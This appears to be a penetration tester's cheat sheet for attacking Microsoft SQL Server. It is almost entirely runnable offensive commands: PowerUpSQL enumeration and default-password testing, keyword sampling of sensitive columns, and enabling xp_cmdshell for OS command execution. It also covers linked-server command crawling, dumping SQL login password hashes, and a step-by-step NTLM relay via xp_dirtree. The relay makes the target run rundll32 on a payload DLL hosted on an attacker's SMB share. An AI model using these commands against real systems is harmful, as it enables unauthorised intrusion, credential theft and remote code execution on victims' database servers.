SQL

ESC - Interactive .NET client for MSSQL abuse

https://github.com/NetSPI/ESC

Connect to MSSQL using windows authentication

mssqlclient.py <user>@<ip> -windows-auth

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

Idenntify SQL instances

Authenticated user

Get-SQLInstanceDomain [| Get-SQLServerInfo]

Unauthenticated user

Get-SQLInstanceScanUDP
Check login access

Attempt to login with a domain account

Get-SQLConnectionTestThreaded

Attempt to login with default password

Get-SQLServerDefaultLoginPw

Save instances with authenticated access to CSV file

powerpick Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

powerpick Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 | Where-Object {$_.Status -like "Accessible"} | Export-Csv -Path .\targets.csv
Post-Exploitation on DB

Perform actions specifying a single instance or all connected targets

Import-Csv -Path .\targets.csv | Get-SQLServerInfo

Invoke-SQLAudit -Verbose -Instance "<INSTANCE>"

List DB, tables, columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

Search column names for a given keyword

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

RCE

Invoke-SQLOSCmd -Verbose -Instance <instance_fqdn> -Command "<command>"

Crawling database link

Get-SQLServerLink
Get-SQLServerLinkCrawl
Get-SQLQuery -Instance "<SERVER1>" -Query 'EXEC "<SERVER2>".master..xp_cmdshell "whoami /all"'

SMB relay via xp_dirtree

Prerequisites
Step 1 - Create a virtual interface
ifconfig <IFACE>:0 <AVAILABLE_IP> netmask <NETMASK>

<IP1> will be the IP of eth0 and <IP2> will be the IP of eth0:0

Step 2 - Configure MSF
use admin/mssql/mssql_ntlm_stealer

set RHOSTS <MSSQL_RHOST>
set RPORT <RPORT>

set SMBPROXY <IP1>

set USE_WINDOWS_AUTHENT true 
Step 3 - Start ntlmrelayx
sudo impacket-ntlmrelayx -smb2support -t <TARGET_RELAY> -c 'rundll32.exe \\<IP2>\public\<PAYLOAD>.dll,Start' -ip <IP1>
Step 4 - Host the payload via SMB share
sudo impacket-smbserver -smb2support public . -ip <IP2>
Step 5 - Start the attack in MSF
run

Enable XP_CMDSHELL

Type one line at a time.

EXEC sp_configure 'show advanced options', 1;  
go  
RECONFIGURE;  
go  
EXEC sp_configure 'xp_cmdshell', 1;  
go  
RECONFIGURE;  
go  
xp_cmdshell '<cmd>'
go

Nmap

nmap -Pn -n --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="<cmd>"

SQLCMD

sqlcmd -E -S localhost -Q "EXEC sp_databases;"
sqlcmd -E -S localhost -Q "SELECT name, password_hash FROM master.sys.sql_logins;"